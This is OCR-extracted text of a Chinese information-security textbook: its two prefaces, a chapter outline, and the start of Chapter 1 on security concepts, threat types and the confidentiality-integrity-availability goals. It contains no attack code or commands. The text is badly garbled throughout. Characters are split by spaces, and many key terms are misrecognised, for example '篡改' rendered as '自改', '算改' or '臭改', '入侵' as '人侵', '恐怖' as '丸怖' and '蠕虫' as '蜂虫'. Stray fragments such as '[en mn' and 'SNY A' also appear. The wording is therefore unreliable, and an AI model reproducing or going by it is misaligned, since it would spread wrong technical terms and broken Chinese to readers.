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第 2 版 前 言 


随 着 科学 技术 的 迅猛 发 展 和 信息 技术 的 广泛 应 用 ,特别 是 我 国 国民 经 济 和 社会 信息 化 进 
程 的 全 面 加 快 ,网 络 与 信息 系统 的 基础 性 、 全 局 性 作用 日 益 增强 ,信息 安全 已 经 成 为 国 
家 安全 的 重要 组 成 部 分 。 如 何 保护 企业 或 个 人 的 信息 系统 免 遭 非法 入 侵 , 如 何 防止 计 
算 机 病毒 对 内 部 网 络 的 侵害 ,这 些 都 是 信息 时 代 企 业 或 个 人 面临 的 实际 问题 。 因 此 , 社 
会 对 信息 安全 技术 的 需求 也 越 来 越 迫 切 。 为 了 满足 社会 的 需要 ,各 高 等 院 校 计算 机 相 
关 专 业 相 继 开设 了 信息 安全 方面 的 课程 。 为 了 满足 信息 安全 技术 教学 方面 的 需求 , 编 
者 编写 了 本 书 。 本 书 在 第 1 版 (2014 年 出 版 ) 的 基础 上 ,删除 了 元 余 陈旧 的 知识 ,补充 
了 信息 安全 领域 的 最 新 发 展 技术 和 成 果 , 并 增加 了 更 实用 的 实 训 操作 知识 和 技能 。 

本 书 以 解决 具体 信息 安全 问题 为 目的 ,全 面 介绍 信息 安全 领域 的 实用 技术 ,帮助 读 
者 了 解 信息 安全 技术 体系 ,掌握 维护 信息 系统 安全 的 常用 技术 和 手段 ,解决 实际 信息 系 
统 的 安全 问题 ,使 读者 全 方位 建立 起 对 信息 安全 体系 的 认识 。 

本 书 由 朱 海 波 任 主编 ,由 辛 海 涛 、 刘 湛 清 任 副 主编 。 全 书 共 13 章 , 其 中 第 1 一 4 章 
和 第 10 章 由 朱 海 波 编写 ,第 8 章 和 第 11 一 13 章 由 辛 海 涛 编写 ,第 5 一 7 章 和 第 9 章 由 
刘 湛 清 编写 。 全 书 由 朱 海 波 负责 统 稿 和 定稿 。 

在 本 书 的 编写 过 程 中 ,吸收 了 许多 专家 的 宝贵 意见 ,参考 了 大 量 的 网 站 资料 和 国内 
外 众多 同行 的 研究 成 果 , 同 时 得 到 了 清华 大 学 出 版 社 的 大 力 支 持 和 帮助 ,在 此 表示 衷心 
的 感谢 。 

由 于 信息 安全 技术 发 展 非常 快 ,本 书 的 选材 和 编写 也 许 有 不 尽 如 人 意 的 地 方 . 加 上 
编者 学 识 水 平和 时 间 所 限 , 书 中 难免 存在 不 足 之 处 ,县 请 同行 专家 和 读者 指正 ,以 便 进 
一 步 完 善 提 高 。 编 者 联系 方式 : chnhsd@163. com。 


编 者 
2019 年 1 月 


第 1 版 前 言 


膏 息 安全 学 科 对 国家 安全 和 经 济 建设 有 着 极其 重要 的 作用 。 近年 来 , 随 着 我 国 国民 经 济 
和 社会 信息 化 进程 的 全 面 加 快 ,计算 机 网 络 在 政治 、 军 事 、 金 融 、 商 业 等 部 门 的 广泛 应 
用 ,网 络 与 信息 系统 的 基础 性 、 全 局 性 作用 不 断 增强 ,全 社会 对 计算 机 网 络 的 依赖 越 来 
越 大 。 网 络 系统 如 果 遭 到 破坏 ,不 仅 会 引起 社会 混乱 ,还 将 带 来 经 济 损失 。 信 息 安 全 已 
经 成 为 国家 安全 的 重要 组 成 部 分 。 加 快 信息 安全 保障 体系 的 建设 培养 高 素质 的 网 络 
安全 人 才 队 伍 ,已 经 成 为 我 国 经 济 社会 发 展 和 信息 安全 体系 建设 中 的 一 项 长 期 性 ,全 局 
性 和 战略 性 的 任务 。 为 此 ,我 们 根据 自己 的 科学 实践 ,结合 信息 安全 与 技术 的 教学 经 
验 ,编写 了 本 书 。 

信息 安全 与 技术 是 一 门 涉及 计算 机 科学 、 网 络 技术 .密码 技术 、 信 息 论 .通信 技术 等 
多 种 学 科 的 综合 性 科学 。 全 书 共 13 章 , 内 容 包括 信息 安全 概述 物理 安全 体系 、 信 息 保 
密 技 术 、 信 息 隐 藏 技术 、 网 络 攻击 技术 .人 侵 检测 技术 .黑客 攻防 剖析 、 网 络 防御 技术 、 无 
线 网 络 安全 与 防御 技术 应 用 层 安 全 技术 .计算 机 病毒 与 防范 技术 .操作 系统 安全 技术 、 
信息 安全 解决 方案 。 

第 1 章 信息 安全 概述 ,介绍 信息 安全 的 基本 概念 及 需求 ,并 系统 地 分 析 信息 安全 环 
境 的 现状 和 网 络 不 安全 的 原因 ,最 后 引出 信息 安全 的 体系 结构 。 

第 2 章 物理 安全 体系 ,介绍 计算 机 系统 的 物理 安全 及 其 主要 内 容 。 物 理 安全 在 整 
个 计算 机 网 络 信息 系统 安全 中 占有 重要 地 位 ,主要 包括 环境 安全 .设备 安全 和 媒体 安全 
3 个 方面 。 

第 3 章 信息 保密 技术 ,介绍 密码 学 的 发 展 历程 ,着 重 介绍 古典 密码 体制 ,对称 密码 
体制 和 非 对 称 密码 体制 ,最 后 介绍 密码 学 的 应 用 ,包括 密码 应 用 模式 和 加 密 方式 。 

第 4 章 信息 隐藏 技术 ,介绍 信息 隐藏 技术 的 发 展 历程 ,着 重 介 绍 信息 隐藏 技术 的 概 
念 ,分 类 及 特性 ,以 及 信息 隐藏 技术 的 常用 算法 、 数 字 水 印 技术 、 隐 通道 技术 和 匿名 通信 
技术 。 

第 5 章 网 络 攻击 技术 ,介绍 网 络 攻击 的 目标 .手段 .层次 .分 类 和 一 般 模 型 ,以 及 信 
息 收 集 技术 的 步骤 ,方法 .工具 ,着 重 介 绍 网 络 后 门 与 网 络 隐身 技术 等 。 

第 6 章 和 人 侵 检测 技术 ,介绍 人 侵 检测 的 概念 、 功 能 及 工作 过 程 .以 及 网 络 人 侵 检测 
系统 产品 ,重点 介绍 人 侵 攻击 可 利用 的 系统 漏洞 类 型 、 漏 洞 检测 技术 分 类 、 系 统 漏洞 检 
测 方法 .常见 的 系统 漏洞 及 防范 以 及 系统 漏洞 检测 工具 。 

第 7 章 黑客 攻防 剖析 ,介绍 黑客 和 了 骇 客 的 起 源 及 概念 ,黑客 的 攻击 分 类 和 步骤 ， 


[en 
mn 
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点 介绍 了 国产 经 典 软件 和 常用 软件 ,最 后 介绍 黑客 攻击 防御 方法 。 

第 8 章 网 络 防御 技术 ,介绍 网 络 体系 结构 .IPSec 协议 .SSL/TLS 协议 ,以 及 防火 
墙 的 基本 概念 、 分 类 、 实 现 模 型 ,最 后 介绍 VPN 技术 、 蜜 钠 主 机 与 欺骗 网 络 等 。 

第 9 章 无 线 网 络 安全 与 防御 技术 ,介绍 无 线 网 络 安全 的 基本 概念 和 无 线 局 域 网 常 
见 的 设备 ,着 重 介绍 无 线 局 域 网 的 标准 、 无 线 网 面临 的 安全 威胁 、 网 络 安 全 协议 和 安全 
技术 等 。 

第 10 童 应 用 层 安 全 技术 ,介绍 Web 安全 技术 ,着 重 介绍 电子 邮件 安全 技术 、 身 份 
认证 技术 和 PKI 安全 体系 等 。 

第 11 章 计 算 机 病毒 与 防范 技术 ,从 概念 分 类 、 特 征 、 破 坏 行为 和 作用 机 理 等 方面 
详细 地 介绍 了 计算 机 病毒 ,并 从 检测 清除 以 及 防范 的 角度 介绍 了 计算 机 病毒 的 防治 。 

第 12 章 操 作 系 统 安全 技术 ,介绍 UNIX、Linux 和 Windows 的 特点 ,着重 介绍 安全 
操作 系统 的 原理 ,介绍 Windows 操作 系统 的 安全 配置 方案 。 

第 13 章 信息 安全 解决 方案 ,介绍 信息 安全 体系 结构 的 现状 、 网 络 安全 需求 ,以 及 常 
见 的 网 络 安全 产品 ,从 网 络 安全 工程 的 角度 介绍 某 大 型 企业 和 电子 政务 的 信息 安全 解 
决 方案 。 

本 书 由 朱 海 波 、 刘 淇 清 、 程 日 来 和 郭 春 阳 编 写 。 全 书 共 13 章 , 其 中 ,第 2、3、4、10、 
13 章 由 朱 海 波 编写 ,第 5、6、7、9、12 章 由 刘淇 清 编 写 , 第 8 章 由 程 日 来 编写 ,第 1、11 章 
由 郭 春 阳 编 写 。 全 书 最 后 由 朱 海 波 负 责 统 稿 .定稿 工作 。 本 书 在 编写 过 程 中 吸收 了 许 
多 专家 的 宝贵 意见 ,参考 了 大 量 的 网 站 资料 和 国内 外 众多 同行 的 研究 成 果 , 在 此 ,编者 
对 有 关 人 士 和 网 站 表示 更 心 的 感谢 ,同时 也 感谢 清华 大 学 出 版 社 的 大 力 支持 。 

由 于 信息 安全 技术 内 容 广泛 且 发 展 迅 速 ,加 之 编者 水 平 有 限 ,本 书 难免 有 政 漏 与 不 
足 之 处 ,恳请 各 位 专家 和 读者 批评 指正 ,以 便 进一步 完善 和 提高 。 


编 者 
2013 年 7 月 
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第 1 章 信息 安全 概述 


随 着 全 球 经 济 和 信息 化 的 发 展 , 信 息 资 源 已 成 为 社会 发 展 的 重要 战略 资源 ,信息 技术 和 
信息 产业 正在 改变 传统 的 生产 和 生活 方式 ,逐步 成 为 国家 经 济 增长 的 主要 推动 力 之 一 。 信 
息 化 、 网 络 化 的 发 展 已 成 为 不 可 阻挡 \ 不 可 回避 、 不 可 逆转 的 历史 潮流 和 历史 事实 ,信息 技术 
和 信息 的 开发 应 用 已 渗透 到 国家 政治 、 经 济 、 军 事 和 社会 生活 的 各 个 方面 ,成 为 生产 力 的 重 
要 因素 。 在 全 球 化 和 信息 化 的 潮流 下 ,信息 安全 面临 诸多 挑战 ,因此 信息 安全 的 研究 与 开发 
显得 更 加 迫切 ,许多 国家 和 地 区 采取 了 有 力 的 措施 推进 信息 安全 技术 与 相关 技术 的 发 展 。 
信息 安全 面临 的 问题 较 多 ,在 方法 上 涉及 数学 ,物理 、 微 电子 、 通 信和 及 计算 机 等 众多 领域 ,有 
着 系统 的 技术 体系 和 丰富 的 科学 内 涵 。 


1.1 信息 安全 基本 概念 


1.1.1 信息 安全 的 含义 


信息 安全 既是 传统 通信 保密 的 延续 和 发 展 , 又 是 网 络 互联 时 代 出 现 的 新 概念 。 信 息 安 
全 概念 是 随 着 信息 技术 的 发 展 而 不 断 拓展 \ 不 断 深化 的 。 信 息 安 全 概念 的 外 延 不 断 扩大 、 内 
涵 不 断 丰富 ,由 单一 的 通信 保密 发 展 到 计算 机 安全 ,信息 系统 安全 ,又 扩展 到 对 信息 基础 设 
施 .应 用 服务 和 信息 内 容 实施 全 面 保护 的 信息 安全 保障 ; 由 单一 的 对 通信 信息 的 保密 ,扩展 
到 对 信息 完整 性 、 真 实 性 的 保护 ,再 深化 到 对 信息 的 保密 性 、 完 整 性 、 真 实 性 、 可 控 性 ,以 及 信 
息 基础 设施 的 可 用 性 和 交互 行为 的 不 可 否认 性 的 全 面 保护 。 

信息 安全 是 一 个 包括 信息 安全 行为 主体 \ 保 护 对 象 . 防 护 手段 .任务 目的 等 内 容 的 综合 
性 概念 。 各 国 国情 和 信息 化 水 平 不 同 ,信息 安全 概念 的 表述 也 不 尽 相 同 。 我 国信 息 安全 的 
概念 可 表述 为 : 信息 安全 是 指 在 政府 主导 和 社会 参与 下 ,综合 运用 技术 ,法 律 .管理 .教育 等 
手段 ,在 信息 空间 积极 应 对 敌对 势力 攻击 、 网 络 犯罪 和 意外 事故 等 多 种 威胁 ,有 效 保护 信息 
基础 设施 、 信 息 系统 、 信 息 应 用 服务 和 信息 内 容 的 安全 ,为 经 济 发 展 , 社 会 稳定 、 国 家 安全 和 
公众 权益 提供 安全 保障 的 活动 。 
1.1.2 对 信息 安全 重要 性 的 认识 

对 信息 安全 重要 性 的 认识 主要 表现 在 以 下 3 个 层面 。 

1. 第 一 个 层面 的 认识 

信息 安全 的 重要 性 主要 体现 在 信息 内 容 安全 ,信息 系统 安全 ,信息 网 络 安全 ,信息 基 础 
设施 安全 等 方面 。 信 息 内 容 的 被 泄露 .被 假冒 .被 伪造 等 ,信息 系统 被 攻击 .被 人 侵 、 被 染 毒 ， 


信息 网 络 被 堵塞 、 被 中 断 、 被 致 瘫 等 ,信息 基础 设施 被 损伤 .被 破坏 、 被 损毁 等 ,这 些 都 是 重要 
的 信息 安全 事件 ,必须 引起 高 度 重视 和 迅速 解决 。 但 是 ,对 信息 安全 重要 性 的 认识 仅仅 停留 
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在 这 个 层面 上 是 不 够 的 。 

2. 第 二 个 层面 的 认识 

美国 在 1990 年 即将 网 络 攻击 武器 视 为 与 核 . 生 、 化 武器 并 列 的 大 规模 破坏 性 武器 ,这 是 
对 信息 安全 重要 性 认识 的 较 高 层面 。 可 以 想象 ,一 个 国家 或 一 个 行业 的 信息 系统 瘫 病 了 ,其 
影响 和 损失 远 远 比 大 规模 杀伤 性 武器 要 大 得 多 。 例 如 ,一 个 国家 的 银行 信息 系统 瘫痪 了 , 整 
个 国家 将 陷入 混乱 ,这 远 比 核 .生化 武器 的 破坏 性 更 广泛 、 更 深入 、 更 持久 。 网 络 攻 击 武器 
是 实现 “不 战 而 届 人 之 兵 ” 的 最 有 效 的 武器 之 一 。 

3. 第 三 个 层面 的 认识 

科学 技术 不 断 发 展 使 得 国家 疆域 不 断 改变 。 航 海 技 术 的 发 展 ,使 得 国家 疆域 从 领土 扩 
展 到 了 领海 ; 航空 技术 的 发 展 ,又 使 得 国家 疆域 扩展 到 了 领空 。 航 天 技术 的 发 展 , 再 使 得 国 
家 疆域 扩展 到 了 太空 。 网 络 技术 的 发 展 ,将 会 使 得 国家 的 疆域 再 次 扩展 。 简 单 来 讲 , 网 络 疆 
域 将 是 国家 疆域 不 可 分 割 的 一 部 分 ,是 不 容 他 人 侵犯 的 国家 疆域 。 这 是 对 信息 安全 重要 性 
认识 的 更 高 层面 。 


1.1.3 信息 安全 的 作用 和 地 位 


随 着 社会 信息 化 发 展 进程 的 不 断 加 快 ,信息 技术 已 渗透 到 国家 政治 、 经 济 、 军 事 和 社会 
生活 的 各 个 方面 ,国家 、 社 会 和 个 人 对 信息 的 依赖 程度 越 来 越 高 ,信息 已 成 为 重要 的 战略 资 
源 ,信息 化 水 平 已 成 为 衡量 一 个 国家 和 地 区 的 国际 竞争 力 、 现 代 化 水 平 、 综 合 国力 和 经 济 成 
长 能 力 的 重要 标志 。 与 此 同时 ,社会 面临 的 信息 安全 威胁 也 成 为 影响 和 制约 国家 发 展 的 重 
要 因素 。 

从 国家 层面 上 看 ,当前 我 国 国民 经 济 和 社会 信息 化 建设 进程 全 面 加 快 ,信息 安全 在 保障 
经 济 发 展 、 社 会 稳定 、 国 家 安全 、 公 众 权益 中 的 作用 和 地 位 日 显 重要 ,主要 表现 为 以 下 几 个 
方面 。 

1. 关乎 经 济 发 展 

目前 ,我 国 已 建立 了 覆盖 全 国 的 公用 电信 和 网、 广播 电视 网 等 基础 信息 网 络 , 银 行 、 民 航 、 
铁路 .电力 .证券 海关、 税务 等 关系 国民 经 济 发 展 和 正常 运行 的 重要 支撑 领域 基本 完成 了 行 
业 信息 系统 建设 ,传统 工业 的 信息 化 改造 正 逐 步 展开 ,电子 政务 .电子 商务 .电子 事务 也 在 不 
断 推 进 , 它 们 在 国家 经 济 发 展 中 起 着 十 分 重要 的 作用 。 这 些 信 息 系 统 的 安全 一 旦 受到 威胁 
和 破坏 , 轻 则 影响 经 济 发 展 , 重 则 损害 国家 经 济 利 益 , 甚 至 导致 整个 国民 经 济 的 瘫痪 或 崩溃 。 
信息 安全 在 经 济 领域 中 的 保障 作用 将 会 越 来 越 重 要 。 

2. 关乎 社会 稳定 


以 Internet 为 代表 的 信息 网 络 , 是 继 报刊 广 播 ` 电 视 之 后 新 兴 的 大 众 媒体 ,具有 传播 迅 
速 、 渗 透 力 强 、 影 响 面 大 的 特点 ,形成 了 一 个 不 受 地 域 限制 的 新 空间 。 在 这 个 空间 里 ,不 同 的 
意识 形态 、 价 值 观念 .行为 规范 .生活 方式 等 在 激烈 碰撞 ,毒害 人 民 污染 社 会 的 色情 、 迷 信和 、 
暴力 等 反动 腐朽 文化 ,经 济 诈骗 . 殴 诈 勒索 ,非法 传销 等 网 络 犯罪 活动 ,以 制造 丸 怖 气氛 ` 造 
成 社会 混乱 为 目的 的 网 络 铠 怖 活动 ,这 些 都 对 我 国 的 社会 稳定 和 公共 秩序 构成 了 严重 危害 。 
有 效应 对 网 络 空 间 中 的 上 述 危 害 ,已 成 为 信息 化 条 件 下 维护 社会 稳定 ,巩固 国家 政权 的 重要 
工作 。 


3. 关乎 国家 安全 

信息 空间 已 成 为 与 领土 .领海 、 领 空 等 并 列 的 国家 主权 疆域 ,信息 安全 是 国家 安全 的 重 
要 组 成 部 分 。 国 内 外 各 种 敌对 分裂、 收 教 等 势力 利用 网 络 对 我 国 进行 的 反动 宣传 和 政治 攻 
击 , 敌 对 国家 和 地 区 对 我 国 实施 的 网 络 渗透 、 网 络 攻击 等 信息 对 抗 行动 ,西方 有 害 价值 观 和 
文化 观 在 网 络 上 的 大 肆 传 播 , 使 我 国 的 政治 安全 、 国 防 安全 和 文化 安全 面临 着 前 所 未 有 的 挑 
战 。 随 着 信息 技术 的 迅速 普及 、 广 泛 应 用 和 深层 渗透 ,信息 安全 在 政治 安全 、 国 防 安全 ,文化 
安全 等 国家 安全 领域 将 具有 越 来 越 重 要 的 作用 。 

4. 关乎 公众 权益 

随 着 科学 技术 和 国民 经 济 的 发 展 ,社会 公众 对 信息 的 依赖 程度 越 来 越 高 ,网 络 的 触角 已 
经 深入 到 社会 生活 的 各 个 方面 。 网 络 应 用 服务 的 普及 直接 涉及 个 人 的 合法 权益 ,宪法 规定 
的 多 项 公众 权益 在 网 络 上 将 逐步 得 到 体现 ,需要 得 到 保护 。 这 种 普遍 的 、 社 会 化 的 需求 ,对 
信息 安全 问题 提出 了 比 以 往 更 广 、 更 高 的 要 求 。 


1.2 信息 安全 环境 及 现状 


1.2.1 信息 安全 的 威胁 
信息 安全 威胁 是 指 某 些 因素 (人 、 物 .事件 方法 等 ) 对 信息 系统 的 安全 使 用 可 能 构成 的 
和 危害。 信息 安全 威胁 来 自 方方面面 ,无 处 不 在 ,如 图 1-1 所 示 。 
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图 1-1 威胁 来 自 方方面面 


一 般 来 说 ,人 们 把 可 能 威胁 信息 安全 的 行为 称 为 攻击 。 在 计算 机 网 络 中 ,常见 的 信息 安 
全 威胁 有 以 下 几 类 。 

(1) 信息 泄露 。 信 息 泄露 是 指 信息 被 泄露 给 未 授权 的 实体 ,泄露 的 形式 主要 包括 窃听 、 
截 收 、 侧 信道 攻击 和 人 员 朴 忽 等 。 其 中 , 截 收 一 般 是 指 窃取 保密 通信 的 电波 、 网 络 信息 等 ; 
侧 信道 攻击 是 指 攻 击 者 虽然 不 能 直接 取得 保密 数据 ,但 是 可 以 获得 这 些 保密 数据 的 相关 信 
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息 ,而 这 些 信息 有 助 于 分 析出 保密 数据 的 内 容 。 

(2) 自 改 。 自 改 是 指 攻 击 者 擅自 更 改 诛 有 信息 的 内 容 , 但 信息 的 使 用 者 并 没有 意识 到 
信息 已 经 被 更 改 的 事实 。 在 传统 环境 下 , 自 改 者 对 纸 质 文件 的 算 改 可 以 通过 一 些 鉴定 技术 
识别 出 来 ; 但 是 在 数字 环境 下 ,对 电子 内 容 的 算 改 不 会 留 下 明显 的 痕迹 。 

(3) 重 放 。 重 放 是 指 攻击 者 可 能 截获 合法 的 通信 信息 ,此 后 出 于 非法 的 目的 重新 发 送 
已 截获 的 信息 ,而 接收 者 可 能 仍然 按照 正常 的 通信 信息 受理 ,从 而 被 攻击 者 所 欺骗。 

(4) 假冒 。 假 冒 是 指 某 用 户 冒 充 其 他 的 用 户 登 录 信息 系统 ,但 是 信息 系统 可 能 并 不 能 
识别 出 冒充 者 ,这 就 使 冒充 者 获得 本 不 该 得 到 的 权限 。 

(5) 和 否认。 否认 是 指 参与 某 次 数据 通信 或 数据 处 理 的 一 方 事后 拒绝 承认 本 次 数据 通信 
或 数据 处 理 曾经 发 生 过 ,这 会 导致 这 类 数据 通信 或 数据 处 理 的 参与 者 逃避 应 承担 的 责任 。 

(6) 非 授权 使 用 。 非 授权 使 用 是 指 信息 资源 被 某 些 未 授权 的 人 或 系统 使 用 ,当然 也 包 
括 被 越权 使 用 的 情形 。 

(7) 网 络 与 系统 攻击 。 由 于 网 络 和 主机 系统 在 设计 或 实现 上 往往 存在 一 些 漏 洞 ,攻击 
者 可 能 利用 这 些 漏洞 来 攻击 主机 系统 ; 此 外 攻击 者 仅 通过 对 某 一 信息 服务 资源 进行 长 期 占 
用 ,使 系统 不 能 够 正常 运转 ,这 种 攻击 一 般 被 称 为 拒绝 服务 攻击 。 

(8) 恶意 代码 。 恶 意 代 码 是 指 恶意 破坏 计算 机 系统 、 窃 取 机 密 信息 或 秘密 地 接受 远程 
操控 的 程序 。 恶 意 代码 由 居心 丐 测 的 用 户 编写 和 传播 ,隐藏 在 受害 方 的 计算 机 系统 中 ,这 些 
代码 也 可 以 进行 自我 复制 和 传播 。 恶 意 代码 主要 包括 木马 程序 、 计 算 机 病毒 .后 门 程序 、 蜂 
虫 病毒 及 僵尸 网 络 等 。 

(9) 故障 、 灾 害 和 人 为 破坏 。 管 理 信息 系 统 也 可 能 因 硬 件 故障 、 自 然 灾害 (水 灾 、 火 灾 及 
地 震 等 ) 或 人 为 破坏 而 受到 破坏 。 

上 面 提 到 的 信息 安全 威胁 直接 危及 信息 安全 的 不 同属 性 。 信 息 泄露 危及 机 密 性 ; 臭 改 
危及 真实 性 和 完整 性 ; 重 放 、 假 冒 和 非 授权 使 用 危及 真实 性 和 可 控 性 ; 否认 危及 非 否 认 性 ; 
网 络 与 系统 攻击 故障、 灾害 和 人 为 破坏 危及 可 用 性 ; 恶意 代码 依照 其 意图 可 能 分 别 危及 可 
用 性 、 机 密 性 和 可 控 性 等 。 以 上 分 析 说 明 , 可 用 性 、 机 密 性 、 完 整 性 、 非 否认 性 、 真 实 性 和 可 控 
性 6 个 属性 反映 了 信息 安全 的 本 质 特征 和 基本 需求 。 

也 可 以 进一步 地 将 信息 安全 威胁 划分 为 4 类 : 暴露 (Disclosure) , 指 对 信息 进行 未 授权 
访问 ,主要 是 来 自信 息 泄露 的 威胁 ; 欺骗 (Deception) , 指 信息 系统 被 误导 接收 到 错误 的 数据 
甚至 做 出 错误 的 判断 ,包括 来 自 算 改 、 重 放假 冒 .否认 等 的 威胁 ; 打扰 (Disruption) , 指 干扰 
或 中 断 信息 系统 的 执行 ,主要 包括 来 自 网 络 与 系统 攻击 、 灾 害 、 故 障 与 人 为 破坏 的 威胁 ; 占 
用 (Usurpation) , 指 未 授权 使 用 信息 资源 或 系统 ,包括 来 自 未 授权 使 用 的 威胁 。 类 似 地 , 恶 
意 代码 按照 其 意图 不 同 可 以 划 归 到 不 同 的 类 别 中 。 

还 可 以 将 前 面 论 及 的 信息 安全 威胁 分 为 被 动 攻击 和 主动 攻击 两 类 。 被 动 攻击 仅 窃听 、 
截 收 和 分 析 受 保护 的 数据 ,这 种 攻击 形式 并 不 复 改 受 保护 的 数据 ,更 不 会 插入 新 的 数据 ; 主 
动 攻击 试图 算 改 受 保护 的 数据 ,或 者 插入 新 的 数据 。 


1.2.2 信息 安全 的 目标 


信息 安全 旨 在 确保 信息 的 机 密 性 、 完 整 性 和 可 用 性 , 即 CIA (Confidentiality、Integrity、 
Arvailability) 。 用 户 A 想 和 用 户 B 进行 一 次 通信 ,下 面 以 这 两 个 用 户 的 通信 过 程 为 例 来 介 
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绍 这 几 个 性 质 。 

(1) 机 密 性 。 机 密 性 是 指 确保 未 授权 的 用 户 不 能 获取 信息 的 内 容 , 即 用 户 A 发 出 的 信 
息 只 有 用 户 B 能 够 收 到 ,如 果 网 络 黑客 C 截获 了 该 信息 但 无 法 理解 信息 的 内 容 , 则 不 能 随 
意 使 用 该 信息 。 一 旦 网 络 黑客 C 了 解 了 该 信息 的 确切 含义 , 则 说 明 网 络 黑客 C 破坏 了 该 信 
息 的 机 密 性 。 

(2) 完整 性 。 完 整 性 也 就 是 确保 信息 的 真实 性 , 即 信息 在 生成 传输 ,存储 和 使 用 过 程 
中 不 应 被 未 授权 用 户 自 改 。 如 果 网 络 黑客 C 截获 了 用 户 A 发 出 的 信息 ,并 且 算 改 了 信息 的 
内 容 , 则 说 明 网 络 黑客 C 破坏 了 信息 的 完整 性 。 

(3) 可 用 性 。 可 用 性 是 指 保证 信息 资源 随时 可 以 提供 服务 的 特性 , 即 授权 用 户 可 以 根 
据 需 要 随时 获得 所 需 的 信息 。 也 就 是 说 要 保证 用 户 A 能 够 顺利 地 发 送信 息 ,用户 B 能 够 顺 
利 地 接收 信息 。 

以 上 3 个 目标 中 只 要 有 一 个 被 破坏 ,就 表明 信息 的 安全 性 受到 了 破坏 。 

信息 安全 旨 在 保证 信息 的 这 3 个 特性 不 被 破坏 。 构 建安 全 系统 的 难点 之 一 就 是 在 相互 
矛盾 的 3 个 特性 中 找到 一 个 最 佳 的 平衡 点 。 例 如 ,在 安全 系统 中 ,只 要 禁止 所 有 的 用 户 读 取 
一 个 特定 的 对 象 ,就 能 够 轻易 地 保护 此 对 象 的 机 密 性 。 但 是 ,这 种 方式 使 这 个 系统 变 得 不 安 
全 ,因为 它 不 能 够 满足 授权 用 户 访问 该 对 象 的 可 用 性 要 求 。 也 就 是 说 ,有 必要 在 机 密 性 和 可 
用 性 之 间 找 到 平衡 点 。 

但 是 只 找到 平衡 点 是 不 够 的 ,实际 上 这 3 个 特性 
既 相 互 独立 ,也 相互 重大 ,如 图 1-2 所 示 , 甚 至 彼此 不 
相 容 ,如 机 密 性 的 保护 会 严重 地 限制 可 用 性 。 

不 同 的 信息 系统 承担 着 不 同类 型 的 业务 ,因此 除 
了 上 面 的 3 个 基本 特性 以 外 ,可 能 还 会 有 更 加 详细 的 SNY 
具体 需求 ,而 且 由 以 下 4 个 特性 来 保证 。 A 

(1) 可 靠 性 (Creliability)。 可 靠 性 是 指 系 统 在 规 
定 条 件 下 和 规定 时 间 内 完成 规定 功能 的 可 能 性 , 它 是 
网 络 安全 最 基本 的 要 求 之 一 ,如 果 网 络 不 可 靠 , 事 故 
不 断 , 网 络 安全 就 无 从 谈 起 。 目 前 ,理论 界 侧重 于 从 
硬件 设备 方面 研究 网 络 的 可 靠 性 ,研制 高 可 靠 性 元 器 件 设 备 ,采取 合理 的 元 余 备 份 措施 仍 是 
最 基本 的 可 靠 性 对 策 。 然 而 ,单纯 研究 硬件 可 靠 性 是 不 够 的 ,软件 .人 员 和 环境 也 会 导致 网 
络 的 故障 ,它们 的 可 靠 性 也 有 待 研 究 。 

(2) 不 可 抵赖 性 (non-repudiation)。 不 可 抵赖 性 是 针对 通信 双方 (人 实体 或 进程 ) 信 息 
真实 性 的 安全 要 求 , 它 包括 收 、 发 信息 双方 均 不 可 抵赖 。 一 是 源 发 证 明 , 它 给 信息 接收 者 提 
供 证 据 , 这 样 信息 发 送 者 就 不 能 够 否认 发 送 该 信息 的 行为 和 信息 的 内 容 ; 二 是 交付 证 明 , 它 
给 信息 发 送 者 提供 证 据 , 这 样 信息 接收 者 就 不 能 够 否认 接收 该 信息 的 行为 和 信息 的 内 容 。 

(3) 可 控 性 。 可 控 性 就 是 监控 信息 及 信息 系统 的 安全 性 。 管 理 机 构 监视 .审计 和 危害 国 
家 信息 的 传播 ,以 及 使 用 加 密 手段 从 事 非 法 活动 的 通信 ,同时 严格 审查 信息 的 传播 及 内 容 。 

(4) 可 审查 性 。 可 审查 性 是 指使 用 一 系列 安全 机 制 (审计 、 监 控 、 防 抵赖 等 ), 使 得 使 用 
者 (包括 合法 用 户 、 攻 击 者 、 破 坏 者 、 抵 赖 者 ) 的 行为 有 据 可 查 , 并 可 以 对 网 络 暴 露出 的 安全 问 
题 提 供 调 查 依据 和 手段 。 审 计 使 用 日 志 记 载 网 络 上 发 生 的 各 种 信息 访问 情况 ,并 定期 统计 


图 1-2 信息 安全 性 质 之 间 的 关系 
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分 析 日 志 。 网 络 管理 人 员 利 用 审计 的 手段 对 网 络 资源 的 使 用 情况 进行 事后 分 析 , 同 时 也 可 
以 发 现 和 追踪 安全 事件 。 审 计 的 主要 目标 为 用 户 、 主 机 和 结 点 ,主要 内 容 为 访问 的 主体 、 客 
体 、 时 间 和 成 败 情况 等 。 


1.2.3 网络 安 全 技术 发 展 的 趋势 


网 络 安全 技术 发 展 趋势 表现 在 以 下 几 个 方面 。 

(1) 新 型 安全 技术 。 为 了 应 对 日 益 严 峻 的 网 络 安全 形式 ,网 络 安全 专家 不 断 地 提出 了 
新 的 网 络 安全 思想 和 网 络 安全 技术 。 网 络 安全 技术 包括 可 信 计 算 、 网 格 计算 .虚拟 机 和 软件 
安全 扫描 等 。 

(2) 集成 化 的 安全 工具 。 在 特定 的 网 络 应 用 环境 中 ,网 络 安全 专家 将 一 些 常用 的 网 络 
安全 技术 集成 在 一 起 ,取得 了 很 好 的 效果 。 病 毒 防火 墙 和 VPN 的 集成 .防火 墙 和 IDS 的 集 
成 .主机 安全 防护 系统 、 安 全 网 关 、 网 络 监控 系统 等 都 是 安全 技术 集成 的 典型 案例 。 

(3) 针对 性 的 安全 工具 。 针 对 性 的 安全 工具 旨 在 应 对 影响 范围 广泛 、 危 害 性 强 的 网 络 
威胁 。 这 类 安全 工具 种 类 繁多 ,如 专门 针对 DDoS 攻击 的 防范 系统 、 专 门 解决 安全 认证 的 
AAA 认证 系统 、 专 门 解决 不 同 应 用 一 致 性 登录 问题 的 单 点 登录 系统 、 内 网 非法 外 联系 

(4) 管理 类 安全 工具 。 随 着 网 络 安 全 技术 的 不 断 发 展 ,为 了 实现 网 络 的 安全 管理 ,网 络 
安全 专家 设计 出 了 基于 管理 思想 的 安全 工具 。 管 理 类 安全 工具 包括 安全 管理 平台 ,统一 威 
胁 管理 工具 和 日 志 分 析 系 统 等 。 

(5) 网 络 安 全 服务 。 面 对 日 益 严 峻 的 网 络 安全 形势 ,人 们 对 网 络 安全 技术 的 要 求 也 越 
来 越 高 。 建 立 一 支 高 水 平 的 安全 管理 人 员 团 队 是 顺理成章 的 选择 ,但 是 建立 一 支 专 业 化 的 
